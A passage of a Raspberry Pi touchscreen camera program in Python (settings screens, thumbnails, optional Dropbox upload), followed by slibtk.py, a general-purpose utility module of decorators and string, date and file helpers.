'/rpi_' + '%04d' % imgNums[loadIdx] + '.jpg')
os.remove(cacheDir + '/rpi_' + '%04d' % imgNums[loadIdx] + '.jpg')
del imgNums[loadIdx]
if len(imgNums):
screen.fill(0)
pygame.display.update()
showNextImage(-1 if loadIdx==len(imgNums) else 0)
else: # Last image deleteted; go to 'no images' mode
screenMode = Mode.NO_IMAGES
imgSurface = None
loadIdx = -1
def storeModeCallback(n): # Radio buttons on storage settings screen
global pathData, storeMode
buttons[Mode.STORAGE][storeMode + 3].setBg('radio3-0')
storeMode = n
buttons[Mode.STORAGE][storeMode + 3].setBg('radio3-1')
#create directory if it does not exist
if not os.path.isdir(pathData[storeMode]):
try:
os.makedirs(pathData[storeMode])
# Set new directory ownership to pi user, mode to 755
os.chown(pathData[storeMode], uid, gid)
os.chmod(pathData[storeMode],
stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
except OSError as e:
# errno = 2 if can't create folder
print errno.errorcode[e.errno]
raise SystemExit
# read all existing image numbers
readImgNumsList(storeMode)
def sizeModeCallback(n): # Radio buttons on size settings screen
global sizeMode
buttons[Mode.SIZE][sizeMode + 3].setBg('radio3-0')
sizeMode = n
buttons[Mode.SIZE][sizeMode + 3].setBg('radio3-1')
camera.resolution = sizeData[sizeMode][1]
def qualityModeCallback(n): # Radio buttons on quality settings screen
global qualityMode
buttons[Mode.QUALITY][3+qualityMode].setBg('radio3-0')
qualityMode = n
buttons[Mode.QUALITY][3+qualityMode].setBg('radio3-1')
# Global stuff -------------------------------------------------------------
screenMode = Mode.VIEWFINDER # Current screen mode; default = viewfinder
screenModePrior = Mode.UNDEFINED # Prior screen mode (for detecting changes)
settingMode = Mode.QUIT # Last-used settings mode (default = quit)
storeMode = 0 # Storage mode; default = Photos folder
storeModePrior = -1 # Prior storage mode (for detecting changes)
sizeMode = 0 # Image size; default = Large
fxMode = 0 # Image effect; default = Normal
isoMode = 0 # ISO setting; default = Auto
awbMode = 0 # AWB setting; default = auto
qualityMode = 0 # Quality setting: default = jpg
iconPath = 'icons' # Subdir containing UI bitmaps (PNG format)
loadIdx = -1 # Image index for loading
imgSurface = None # pygame Surface w/last-loaded image
# list of existing image numbers. Read by storeModeCallback using
# readImgNumsList
imgNums = []
# To use Dropbox uploader, must have previously run the dropbox_uploader.sh
# script to set up the app key and such. If this was done as the normal pi
# user, set upconfig to the .dropbox_uploader config file in that account's
# home directory. Alternately, could run the setup script as root and
# delete the upconfig line below.
uploader = '/home/pi/Dropbox-Uploader/dropbox_uploader.sh'
upconfig = '/home/pi/.dropbox_uploader'
sizeData = [ # Camera parameters for different size settings
# Full res Viewfinder
[(2592, 1944), (320, 240)], # Large
[(1920, 1080), (320, 180)], # Med
[(1440, 1080), (320, 240)]] # Small
isoData = [ # Values for ISO settings [ISO value, indicator X position]
[ 0, 27], [100, 64], [200, 97], [320, 137],
[400, 164], [500, 197], [640, 244], [800, 297]]
# Setting for auto white balance. A fixed list is used because
# we have pre-generated icons.
awbData = [ 'auto', 'off', 'sunlight',
'cloudy', 'shade', 'tungsten', 'fluorescent', 'incandescent',
'flash', 'horizon' ]
# A fixed list of image effects is used (rather than polling
# camera.IMAGE_EFFECTS) because the latter contains a few elements
# that aren't valid (at least in video_port mode) -- e.g. blackboard,
# whiteboard, posterize (but posterise, British spelling, is OK).
# Others have no visible effect (or might require setting add'l
# camera parameters for which there's no GUI yet) -- e.g. saturation,
# colorbalance, colorpoint.
fxData = [
'none', 'sketch', 'gpen', 'pastel', 'watercolor', 'oilpaint', 'hatch',
'negative', 'colorswap', 'posterise', 'denoise', 'blur', 'film',
'washedout', 'emboss', 'cartoon', 'solarize' ]
# cache directory for thumbnails
cacheDir = '/home/pi/.cache/picam'
pathData = [
'/home/pi/Photos', # Path for storeMode = 0 (Photos folder)
'/boot/DCIM/CANON999', # Path for storeMode = 1 (Boot partition)
'/home/pi/Photos'] # Path for storeMode = 2 (Dropbox)
icons = [] # This list gets populated at startup
# buttons[] is a list of lists; each top-level list element corresponds
# to one screen mode (e.g. viewfinder, image playback, storage settings),
# and each element within those lists corresponds to one UI button.
# There's a little bit of repetition (e.g. prev/next buttons are
# declared for each settings screen, rather than a single reusable
# set); trying to reuse those few elements just made for an ugly
# tangle of code elsewhere.
buttons = [0] * (Mode.LAST+1) # create dummy elements for every screen
buttons[Mode.PLAYBACK] = [
Button(( 0,188,320, 52), bg='done' , cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev' , cb=imageCallback, value=-1),
Button((240, 0, 80, 52), bg='next' , cb=imageCallback, value= 1),
Button(( 88, 70,157,102)), # 'Working' label (when enabled)
Button((148,129, 22, 22)), # Spinner (when enabled)
Button((121, 0, 78, 52), bg='trash', cb=imageCallback, value= 0)]
buttons[Mode.DELETE] = [
Button(( 0,35,320, 33), bg='delete'),
Button(( 32,86,120,100), bg='yn', fg='yes',cb=deleteCallback, value=True),
Button((168,86,120,100), bg='yn', fg='no',cb=deleteCallback, value=False)]
buttons[Mode.NO_IMAGES] = [
Button((0, 0,320,240), cb=doneCallback), # Full screen = button
Button((0,188,320, 52), bg='done'), # Fake 'Done' button
Button((0, 53,320, 80), bg='empty')] # 'Empty' message
buttons[Mode.VIEWFINDER] = [
Button(( 0,188,156, 52), bg='gear', cb=viewCallback, value=0),
Button((164,188,156, 52), bg='play', cb=viewCallback, value=1),
Button(( 0, 0,320,240) , cb=viewCallback, value=2),
Button(( 88, 51,157,102)), # 'Working' label (when enabled)
Button((148, 110,22, 22))] # Spinner (when enabled)
buttons[Mode.STORAGE] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 2, 60,100,120), bg='radio3-1', fg='store-folder',
cb=storeModeCallback, value=0),
Button((110, 60,100,120), bg='radio3-0', fg='store-boot',
cb=storeModeCallback, value=1),
Button((218, 60,100,120), bg='radio3-0', fg='store-dropbox',
cb=storeModeCallback, value=2),
Button(( 0, 10,320, 35), bg='storage')]
buttons[Mode.SIZE] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 2, 60,100,120), bg='radio3-1', fg='size-l',
cb=sizeModeCallback, value=0),
Button((110, 60,100,120), bg='radio3-0', fg='size-m',
cb=sizeModeCallback, value=1),
Button((218, 60,100,120), bg='radio3-0', fg='size-s',
cb=sizeModeCallback, value=2),
Button(( 0, 10,320, 29), bg='size')]
buttons[Mode.EFFECT] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 0, 70, 80, 52), bg='prev', cb=fxCallback , value=-1),
Button((240, 70, 80, 52), bg='next', cb=fxCallback , value= 1),
Button(( 0, 67,320, 91), bg='fx-none'),
Button(( 0, 11,320, 29), bg='fx')]
buttons[Mode.ISO] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 0, 70, 80, 52), bg='prev', cb=isoCallback , value=-1),
Button((240, 70, 80, 52), bg='next', cb=isoCallback , value= 1),
Button(( 0, 79,320, 33), bg='iso-0'),
Button(( 9,134,302, 26), bg='iso-bar'),
Button(( 17,157, 21, 19), bg='iso-arrow'),
Button(( 0, 10,320, 29), bg='iso')]
buttons[Mode.AWB] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 0, 70, 80, 52), bg='prev', cb=awbCallback , value=-1),
Button((240, 70, 80, 52), bg='next', cb=awbCallback , value= 1),
Button(( 0, 67,320, 91), bg='awb-auto'),
Button(( 0, 11,320, 29), bg='awb')]
buttons[Mode.QUALITY] = [
Button(( 0,188,320, 52), bg='done', cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev', cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next', cb=settingCallback, value= 1),
Button(( 32, 60,100,120), bg='radio3-1', fg='quality-jpg',
cb=qualityModeCallback, value=0),
Button((188, 60,100,120), bg='radio3-0', fg='quality-jpg+raw',
cb=qualityModeCallback, value=1),
Button(( 0, 10,320, 35), bg='quality')]
buttons[Mode.QUIT] = [
Button(( 0,188,320, 52), bg='done' , cb=doneCallback),
Button(( 0, 0, 80, 52), bg='prev' , cb=settingCallback, value=-1),
Button((240, 0, 80, 52), bg='next' , cb=settingCallback, value= 1),
Button((110, 60,100,120), bg='quit-ok', cb=quitCallback),
Button(( 0, 10,320, 35), bg='quit')]
# Assorted utility functions -----------------------------------------------
def setFxMode(n):
global fxMode
fxMode = n
camera.image_effect = fxData[fxMode]
buttons[Mode.EFFECT][5].setBg('fx-' + fxData[fxMode])
def setIsoMode(n):
global isoMode
isoMode = n
camera.ISO = isoData[isoMode][0]
buttons[Mode.ISO][5].setBg('iso-' + str(isoData[isoMode][0]))
buttons[Mode.ISO][7].rect = ((isoData[isoMode][1] - 10,) +
buttons[Mode.ISO][7].rect[1:])
def setAwbMode(n):
global awbMode
awbMode = n
buttons[Mode.AWB][5].setBg('awb-' + awbData[awbMode])
camera.awb_mode = awbData[awbMode]
if awbData[awbMode] == 'off':
camera.awb_gains = (1.0,1.0) # needed because of ignorant engineers
# record white-balance in exif. Too bad exif-tags only allow auto/manual.
if awbData[awbMode] == 'auto':
camera.exif_tags['EXIF.WhiteBalance'] = '0'
else:
camera.exif_tags['EXIF.WhiteBalance'] = '1'
def saveSettings():
try:
outfile = open(os.path.expanduser('~')+'/cam.pkl', 'wb')
# Use a dictionary (rather than pickling 'raw' values) so
# the number & order of things can change without breaking.
d = { 'fx' : fxMode,
'iso' : isoMode,
'awb' : awbMode,
'quality' : qualityMode,
'size' : sizeMode,
'store' : storeMode }
pickle.dump(d, outfile)
outfile.close()
except:
pass
def loadSettings():
try:
infile = open(os.path.expanduser('~')+'/cam.pkl', 'rb')
d = pickle.load(infile)
infile.close()
if 'fx' in d: setFxMode( d['fx'])
if 'iso' in d: setIsoMode( d['iso'])
if 'awb' in d: setAwbMode( d['awb'])
if 'quality' in d: qualityModeCallback(d['quality'])
if 'size' in d: sizeModeCallback( d['size'])
if 'store' in d: storeModeCallback(d['store'])
except:
storeModeCallback(storeMode)
# Read existing numbers into imgNums. Triggerd by a change of
# storeMode.
def readImgNumsList(n):
global pathData, imgNums
imgNums = []
for file in os.listdir(pathData[n]):
if fnmatch.fnmatch(file,'rpi_[0-9][0-9][0-9][0-9].jpg'):
imgNums.append(int(file[4:8]))
imgNums.sort()
# Busy indicator. To use, run in separate thread, set global 'busy'
# to False when done.
def spinner():
global busy, screenMode, screenModePrior
buttons[screenMode][3].setBg('working')
buttons[screenMode][3].draw(screen)
pygame.display.update()
busy = True
n = 0
while busy is True:
buttons[screenMode][4].setBg('work-' + str(n))
buttons[screenMode][4].draw(screen)
pygame.display.update()
n = (n + 1) % 5
time.sleep(0.15)
buttons[screenMode][3].setBg(None)
buttons[screenMode][4].setBg(None)
screenModePrior = Mode.UNDEFINED # Force refresh
def saveThumbnail(fname,tname): # fname: filename with extension
metadata = pyexiv2.ImageMetadata(fname)
metadata.read()
thumb = metadata.exif_thumbnail
thumb.write_to_file(tname) # tname: thumbname without extension
os.chown(tname+".jpg", uid, gid)
os.chmod(tname+".jpg",
stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH)
def takePicture():
global busy, gid, loadIdx, imgSurface, sizeMode, storeMode, storeModePrior, uid, cacheDir, imgNums
saveNum = imgNums[-1] + 1 % 10000 if len(imgNums) else 0
filename = pathData[storeMode] + '/rpi_' + '%04d' % saveNum + '.jpg'
cachename = cacheDir+'/rpi_' + '%04d' % saveNum
t = threading.Thread(target=spinner)
t.start()
imgSurface = None
camera.resolution = sizeData[sizeMode][0]
try:
camera.capture(filename, use_video_port=False, format='jpeg',
thumbnail=(340,240,60),bayer=qualityMode==1)
imgNums.append(saveNum)
# Set image file ownership to pi user, mode to 644
os.chown(filename, uid, gid)
os.chmod(filename,
stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH)
saveThumbnail(filename,cachename)
imgSurface = pygame.image.load(cachename+'.jpg')
if storeMode == 2: # Dropbox
if upconfig:
cmd = uploader + ' -f ' + upconfig + ' upload ' + filename + ' Photos/' + os.path.basename(filename)
else:
cmd = uploader + ' upload ' + filename + ' Photos/' + os.path.basename(filename)
call ([cmd], shell=True)
finally:
# Add error handling/indicator (disk full, etc.)
camera.resolution = sizeData[sizeMode][1]
busy = False
t.join()
if imgSurface:
if imgSurface.get_height() < 240: # Letterbox
screen.fill(0)
screen.blit(imgSurface,
((320 - imgSurface.get_width() ) / 2,
(240 - imgSurface.get_height()) / 2))
pygame.display.update()
time.sleep(2.5)
loadIdx = len(imgNums)-1
def showNextImage(direction):
global busy, loadIdx, imgNums
loadIdx += direction
if loadIdx == len(imgNums): # past end of list, continue at beginning
loadIdx = 0
elif loadIdx == -1: # before start of list, continue with end of list
loadIdx = len(imgNums)-1
showImage(loadIdx)
def showImage(n):
global busy, imgNums, imgSurface, screenMode, screenModePrior, storeMode, pathData
t = threading.Thread(target=spinner)
t.start()
cachefile = cacheDir + '/rpi_' + '%04d' % imgNums[n] + '.jpg'
# if cachefile does not exist, recreate it
if not os.path.exists(cachefile):
filename = pathData[storeMode] + '/rpi_' + '%04d' % imgNums[n] + '.jpg'
saveThumbnail(filename,cacheDir + '/rpi_' + '%04d' % imgNums[n])
imgSurface = pygame.image.load(cachefile)
busy = False
t.join()
screenMode = Mode.PLAYBACK
screenModePrior = Mode.UNDEFINED # Force screen refresh
# Initialization -----------------------------------------------------------
# fix iconPath: it's relative to the executable
thisDir,thisFile = os.path.split(sys.argv[0])
iconPath = thisDir + os.path.sep + iconPath
# Init framebuffer/touchscreen environment variables
os.putenv('SDL_VIDEODRIVER', 'fbcon')
os.putenv('SDL_FBDEV' , '/dev/fb1')
os.putenv('SDL_MOUSEDRV' , 'TSLIB')
os.putenv('SDL_MOUSEDEV' , '/dev/input/touchscreen')
# running as root from /etc/rc.local and not under sudo control, so
# query ids directly
uid = pwd.getpwnam("pi").pw_uid
gid = pwd.getpwnam("pi").pw_gid
# Buffers for viewfinder data
rgb = bytearray(320 * 240 * 3)
# Init pygame and screen
pygame.init()
pygame.mouse.set_visible(False)
screen = pygame.display.set_mode((0,0), pygame.FULLSCREEN)
# Init camera and set up default values
camera = picamera.PiCamera()
atexit.register(camera.close)
camera.resolution = sizeData[sizeMode][1]
# Load all icons at startup.
for file in os.listdir(iconPath):
if fnmatch.fnmatch(file, '*.png'):
icons.append(Icon(file.split('.')[0]))
# Assign Icons to Buttons, now that they're loaded
for s in buttons: # For each screenful of buttons...
for b in s: # For each button on screen...
for i in icons: # For each icon...
if b.bg == i.name: # Compare names; match?
b.iconBg = i # Assign Icon to Button
b.bg = None # Name no longer used; allow garbage collection
if b.fg == i.name:
b.iconFg = i
b.fg = None
# one-time initialization of cache-directory
if not os.path.isdir(cacheDir):
try:
os.makedirs(cacheDir)
# Set new directory ownership to pi user, mode to 755
os.chown(cacheDir, uid, gid)
os.chmod(cacheDir,
stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
except OSError as e:
# errno = 2 if can't create folder
print errno.errorcode[e.errno]
raise SystemExit
loadSettings() # Must come last; fiddles with Button/Icon states
# Main loop ----------------------------------------------------------------
while(True):
# Process touchscreen input
while True:
for event in pygame.event.get():
if(event.type is MOUSEBUTTONDOWN):
pos = pygame.mouse.get_pos()
for b in buttons[screenMode]:
if b.selected(pos): break
# If in viewfinder or settings modes, stop processing touchscreen
# and refresh the display to show the live preview. In other modes
# (image playback, etc.), stop and refresh the screen only when
# screenMode changes.
if screenMode >= Mode.VIEWFINDER or screenMode != screenModePrior: break
# Refresh display
if screenMode >= Mode.VIEWFINDER: # Viewfinder or settings modes
stream = io.BytesIO() # Capture into in-memory stream
camera.capture(stream, resize=sizeData[sizeMode][1],
use_video_port=True, format='rgb')
stream.seek(0)
stream.readinto(rgb)
stream.close()
img = pygame.image.frombuffer(rgb[0:
(sizeData[sizeMode][1][0] * sizeData[sizeMode][1][1] * 3)],
sizeData[sizeMode][1], 'RGB')
elif screenMode in [Mode.PLAYBACK, Mode.DELETE]:
img = imgSurface # Show last-loaded image
else: # 'No Photos' mode
img = None # You get nothing, good day sir
if img is None or img.get_height() < 240: # Letterbox, clear background
screen.fill(0)
if img:
screen.blit(img,
((320 - img.get_width() ) / 2,
(240 - img.get_height()) / 2))
# Overlay buttons on display and update
for i,b in enumerate(buttons[screenMode]):
b.draw(screen)
pygame.display.update()
screenModePrior = screenMode
|
slibtk.py
|
"""
standard library tool-kit
this module contains commonly used functions to process and manipulate standard library objects
"""
import csv
import functools
import itertools
import json
import logging
import os
import pickle
import random
import re
import sys
import time
from collections import namedtuple, defaultdict, OrderedDict
from concurrent.futures import as_completed, ProcessPoolExecutor
from concurrent.futures.thread import ThreadPoolExecutor
from datetime import timedelta
from threading import Thread
import psutil
from dateutil.relativedelta import relativedelta
from tqdm import tqdm
from slibtk.core import *
import smtplib
import os
from email.message import EmailMessage
import sys
import traceback
from pathlib import Path
import statistics
logger = logging.getLogger(__name__)
# decorators ###########################################################################################################
def log_input():
return log_input_and_output(input_flag=True, output_flag=False)
def log_output():
return log_input_and_output(input_flag=False, output_flag=True)
def log_input_and_output(input_flag=True, output_flag=True, positional_input_index: int = 0,
kw_input_key: Optional[Hashable] = None):
"""logs the input (first positional argument) and output of decorated function, you can specify a specific kw
arg to be logged as input by specifying its corresponding param key"""
def outer_wrapper(func):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
if input_flag:
if kw_input_key:
# noinspection PyTypeChecker
input_arg = kwargs[kw_input_key]
else:
input_arg = _get_positional_arg(args, kwargs, positional_input_index)
logger.info(f'{func.__name__}: input={input_arg}'[:300])
result = func(*args, **kwargs)
if output_flag:
logger.info(f'{func.__name__}: output={result}'[:300])
return result
return inner_wrapper
return outer_wrapper
def _get_positional_arg(args, kwargs, index: int = 0) -> Any:
"""returns the first positional arg if there are any, if there are only kw args it returns the first kw arg"""
try:
input_arg = args[index]
except KeyError:
input_arg = list(kwargs.values())[index]
return input_arg
def sleep_before(secs_before: float):
"""call the sleep function before the decorated function is called"""
return sleep_before_and_after(secs_before=secs_before, secs_after=0)
def sleep_after(secs_after: float):
"""call the sleep function after the decorated function is called"""
return sleep_before_and_after(secs_before=0, secs_after=secs_after)
def sleep_before_and_after(secs_before: float = 0, secs_after: float = 0):
"""call the sleep method before and after the decorated function is called, pass in the sleep duration in
seconds. Default values are 0."""
def outer_wrapper(func):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
if secs_before:
time.sleep(secs_before)
result = func(*args, **kwargs)
if secs_after:
time.sleep(secs_after)
return result
return inner_wrapper
return outer_wrapper
def timer(func):
"""decorator that logs the time taken for the decorated func to run"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
start: float = time.time()
result = func(*args, **kwargs)
hr_time_elapsed: str = hr_secs(time.time() - start)
logger.info(f'time taken {func.__name__}: {hr_time_elapsed}')
return result
return wrapper
def runtimes(arg_values: Sequence):
"""decorator that records the runtime (seconds) for several values of a single
argument that is passed to the decorated func, returning the argument: second
pairs in a dictionary"""
def outer_wrapper(func: Callable):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
logger.info(f'monitoring runtimes for func={func.__name__}, values={arg_values}')
times = {}
for value in arg_values:
start = time.time()
func(value, *args, **kwargs)
seconds = time.time() - start
times[value] = seconds
logger.info(f'param={value} seconds={seconds}')
return times
return inner_wrapper
return outer_wrapper
def average_timer(n_runs: int):
"""decorator that logs the average time taken for `n_runs` of the decorated"""
def outer_wrapper(func: Callable):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
times = []
for _ in range(n_runs):
start = time.time()
func(*args, **kwargs)
times.append(time.time() - start)
mil = 1_000_000
print(
f'n_runs: {n_runs}, average time taken: {statistics.mean(times) * mil:.3f}us, min: {min(times) * mil:.3f}us')
return func(*args, **kwargs)
return inner_wrapper
return outer_wrapper
class RunTimes:
"""
stores run-times of methods in the programme and can display totals
"""
times = defaultdict(list)
@classmethod
def add_time(cls, method_nm, runtime: float) -> None:
cls.times[method_nm].append(runtime)
@classmethod
def _max_method_len(cls):
return max([len(key) for key in cls.times.keys()])
@classmethod
def show_total_times(cls) -> None:
"""print print the total cumulative runtime of each decorated method"""
for method, times in cls.times.items():
print(f'{method:}:'.ljust(cls._max_method_len() + 1), sum(times))
@classmethod
def get_method_runtime(cls, method_nm: str = None):
"""stores the runtime of decorated callable in RunTimes"""
def outer_wrapper(func):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
start = time.time()
result = func(*args, **kwargs)
name = method_nm if method_nm else func.__name__
cls.add_time(name, time.time() - start)
return result
return inner_wrapper
return outer_wrapper
def with_cache(path: PathOrStr, use_cache: bool = True, fname: Optional[str] = None) -> Callable:
"""
decorator that will use a pickled version of a functions return if it exists when the function called else it will
execute the function as normal
Parameters
----------
path: cache file location
use_cache: flag that allows you to overwrite the default behavior of reading from the cache
Returns
-------
outer_wrapper: the decorated function callable
"""
path = Path(path)
def _outer_wrapper(func):
@functools.wraps(func)
def _inner_wrapper(*args, **kwargs):
if (path / f'{func.__name__}.pickle').exists() and use_cache:
cached = read_pickle((path / f'{func.__name__}.pickle'))
logger.info(f'loaded return from cache: {func.__name__}')
return cached
result = func(*args, **kwargs)
write_pickle(result, (path / f'{func.__name__}.pickle'))
if not (path / f'{func.__name__}.pickle').exists():
logger.info(f'no cache exists')
logger.info(f'saved return to cache: {func.__name__}')
return result
return _inner_wrapper
return _outer_wrapper
# string tools #########################################################################################################
def re_no_decimal_places(s: str):
return re.sub(r'(\d*)\.(\d*)', r'\1', s)
def re_n_decimal_places(s: str, n: int = 0) -> str:
matches = re.findall(r'(\d+)(\.\d*)', s)
for match in matches:
s = s.replace(''.join(match), match[0] + match[1][:n + 1])
return s if n > 0 else re_no_decimal_places(s)
def camel2snake(s: str) -> str:
s = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', s)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s).lower()
def snake2camel(s: str) -> str:
snake_re = re.compile('_?[a-z]+_?')
return ''.join([word.strip('_').capitalize() for word in snake_re.findall(s)])
def to_slug(s: str):
"""covert string to slug format
before: Hello world!!
after: hello_world"""
s = str(s)
s = re.sub('[^\w\s]+', '', s)
return '_'.join(s.lower().split())
def prefix_if_first_is_digit(s) -> str:
"""if the first item of a string is a digit prefix it with an underscore"""
if s[0].isdigit():
return '_' + s
return s
def replace(text: str, items: Union[Dict, Tuple]) -> str:
"""Execute a sequence of find and replace pairs on a string."""
if isinstance(items, dict): items = items.items()
for k, v in items:
text = text.replace(k, v)
return text
def trim(string: str) -> str:
"""remove all escape characters and double white spaces"""
return ' '.join(string.replace(u'\xa0', u' ').split())
def hr_bytes(n_bytes: int, binary=False, decimal_places=1):
"""return bytes in a human readable format"""
if binary:
factor, units = 1024, ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB']
else:
factor, units = 1000, ['B', 'KB', 'MB', 'GB', 'TB', 'PB']
for unit in units:
if n_bytes < factor:
break
n_bytes /= factor
return f"{n_bytes:.{decimal_places}f}{unit}"
def hr_numbers(num: float, decimal_places: int = 1) -> str:
"""return number in human readable format"""
scale = 1000
units = ['', 'K', 'M', 'B', 'T']
for unit in units:
if abs(num) < scale:
break
num /= scale
return f'{num:,.{decimal_places}f}{unit}'
def grep_(pattern: str, text: str, window: int = 30) -> List[str]:
"""text pattern matches of length plus and minus window"""
matches = []
for match in re.finditer(pattern, string=text, flags=re.IGNORECASE):
matches.append(text[match.start() - window:match.start() + window])
return matches
# iterable tools #######################################################################################################
def is_listy(x: Any) -> bool: return isinstance(x, (tuple, list))
def listify(x: Any) -> List:
"""Make `x` a list"""
if isinstance(x, str): x = [x]
if not isinstance(x, Iterable): x = [x]
return list(x)
assert isinstance(listify(['hello', 'world']), list)
assert isinstance(listify('hello world'), list)
assert isinstance(listify(range(5)), list)
def uniqueify(items: Iterable) -> List:
"""remove duplicates from iterable and preserve order"""
return list(OrderedDict.fromkeys(items).keys())
def recurse_sum(x):
"""recursively sum floats and ints in any combination of nested lists and dicts"""
numbers = []
def cache_numbers(x: Any) -> None:
if isinstance(x, (float, int)): numbers.append(x)
return x
recurse(cache_numbers, x)
return sum(numbers)
def recurse(func: Callable, x: Any, *args, **kwargs) -> Any:
"""recursively apply func to any combination of nested lists and dicts"""
if isinstance(x, (list, tuple)): return [recurse(func, o, *args, **kwargs) for o in x]
if isinstance(x, dict): return {k: recurse(func, v, *args, **kwargs) for k, v in x.items()}
return func(x, *args, **kwargs)
def wildcard_filter(items: Iterable, query: str) -> List[str]:
"""filter a list by query, can accept a wildcard search"""
return [x for x in items if re.search(query, str(x))]
def map_with_special_case(items: Iterable, func_first: Callable, func_everything_else: Callable) -> Iterable:
"""map a function to an iterable with a special case function for the first item in the iterable"""
results = []
for i, item in enumerate(items):
if i > 0:
results.append(func_everything_else(item))
else:
results.append(func_first(item))
return results
def flattener(lst: List[List]) -> List:
"""flatten list"""
return list(itertools.chain.from_iterable(lst))
def transpose_grid(matrix: List[List]) -> List[Tuple[Any]]:
"""transpose a list matrix and return it"""
return list(zip(*matrix))
def make_every_combination(items) -> List[Tuple]:
"""return a list of every combination of the original list of items. For every subset lenght."""
combinations = []
for i in range(len(items) + 1):
combinations.extend(
list(itertools.combinations(items, i))
)
return combinations
# iterator / generator tools ###########################################################################################
def chunkify(seq: Sequence, size: int) -> Iterator[List]:
"""yield successive size-sized chunks from seq"""
for i in range(0, len(seq), size):
yield seq[i:i + size]
def chunks_index(seq: List, size: int) -> Generator[Dict[int, List], None, None]:
"""yield successive size-sized chunks from seq in a dicts where the key is the ith batch"""
ChunkIndex = namedtuple('ChunkIndex', ['chunk', 'index'])
for i in range(0, len(seq), size):
yield ChunkIndex(chunk=seq[i:i + size], index=i)
# dictionary tools #####################################################################################################
def dict_sample(d: Dict, n_samples: int = 5) -> Dict:
"""randomly select a subset of a dictionary"""
keys = list(d)
keys = [random.choice(keys) for _ in range(n_samples)]
return {key: d[key] for key in keys}
# datetime tools #######################################################################################################
def current_date_minute() -> str:
"""return current date minute as a string e.g. '2021-02-02_0905'"""
return str(datetime.now().replace(microsecond=0)).replace(':', '').replace(' ', '_')[:-2]
def make_tsub(n: int) -> Tuple[datetime.date, datetime.date]:
"""return start and end date of the the 365 day period prior to today with an n year lag"""
assert n > 0, 'n must be positive'
year_lag = timedelta(days=(366 * (n - 1)))
end = datetime.now().date() - timedelta(days=1)
start = end - timedelta(days=365)
start, end = start - year_lag, end - year_lag
assert (end - start).days == 365
return start, end
def past_date(start: Optional[DateLike] = None, years: int = 0, months: int = 0, weeks: int = 0, days: int = 0,
as_str: bool = False, **kwargs) -> DateLike:
"""get a date x months/years ago from today or start if specified"""
if not start:
start = datetime.now()
if isinstance(start, str): start = datetime.fromisoformat(start)
date = start - relativedelta(years=years, months=months, weeks=weeks, days=days, **kwargs)
if as_str:
return date.date().isoformat()
return date
def hr_secs(secs: float) -> str:
"""format seconds human readable format hours:mins:seconds"""
secs_per_hour: int = 3600
secs_per_min: int = 60
hours, remainder = divmod(secs, secs_per_hour)
mins, seconds = divmod(remainder, secs_per_min)
return f'{int(hours):02}:{int(mins):02}:{seconds:05.2f}'
def hr_secs_elapsed(start: float) -> str:
"""format seconds from elapsed since start in human readable format hours:mins:seconds"""
return hr_secs(time.time() - start)
# io in outs ##############################################################################################################
class FileTXT:
"""abstract class representing a text file"""
def __init__(self, path: Union[Path, str]):
self.path = Path(path) if isinstance(path, str) else path
def exists(self) -> bool:
return self.path.exists()
def show(self, num: int = 10) -> None:
with self.path.open() as f:
for i in range(num):
print(next(f))
def clear(self) -> None:
with self.path.open('w'):
pass
class ListTXT(FileTXT):
"""object to represent a text file containing a list"""
def __init__(self, path: Union[Path, str]):
super().__init__(path)
def write(self, lines: List) -> None:
"""save a list as a test file where each element corresponds to a line in the text file"""
with self.path.open('w') as f:
for line in tqdm(lines):
f.write(f'{str(line).strip()}\n')
logger.info(f'saved txt file: {self.path}')
def read(self) -> List:
"""parse text file into list"""
with self.path.open() as f:
lines = f.read().splitlines()
return lines
class LogTXT(FileTXT):
"""simple log file object"""
def __init__(self, path: Union[Path, str]):
super().__init__(path)
def write(self, line) -> None:
with self.path.open('a') as f:
f.write(f'{str(line).strip()}\n')
def read(self) -> List:
with self.path.open() as f:
lines = f.read().splitlines()
return lines
def clear(self) -> None:
with self.path.open('w'):
pass
class FileCSV:
"""simple csv file object"""
def __init__(self, path):
self.path = path
def write(self, seq):
with self.path.open('w') as f:
writer = csv.writer(f)
for line in tqdm(seq):
writer.writerow(line)
def read(self) -> Iterator:
with self.path.open() as f:
reader = csv.reader(f, delimiter=',')
rows = (row for row in reader)
return rows
class IterLines:
"""lazy iterator for every file matched in a glob search"""
def __init__(self, path: Path, pattern: str):
self.path = path
self.pattern = pattern
self.files = path.rglob(pattern)
def __iter__(self):
for file in self.files:
for line in file.open():
yield line.split()
